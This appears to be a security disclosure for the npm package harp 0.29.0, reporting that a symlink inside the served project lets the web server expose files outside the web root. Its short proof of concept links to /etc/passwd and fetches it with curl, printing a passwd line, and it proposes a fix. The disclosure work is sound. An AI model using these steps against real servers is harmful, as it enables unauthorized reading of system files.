In reference to #453820
module name: harp
version: 0.29.0
npm page: https://www.npmjs.com/package/harp
zero-configuration web server with built in pre-processing
2,679 downloads in the last week
Path traversal via symlink.
Similar to #403703: a symlink placed inside the project directory can be used to expose any file in a folder outside the web root.
```shell
$ yarn global add harp        # install harp 0.29.0 globally
$ harp server                 # serve the current project directory (default port 9000)
$ ln -s ../../../../../etc/passwd sympasswd   # symlink inside the project pointing outside the web root
$ curl --path-as-is 0.0.0.0:9000/sympasswd     # the server follows the symlink and returns the target
root:x:0:0:root:/root:/bin/bash
...
```
Suggested fix: document this behaviour and, preferably, provide a flag to enable or disable following symlinks.
Impact: files outside the project directory can be read through the server via a symlink.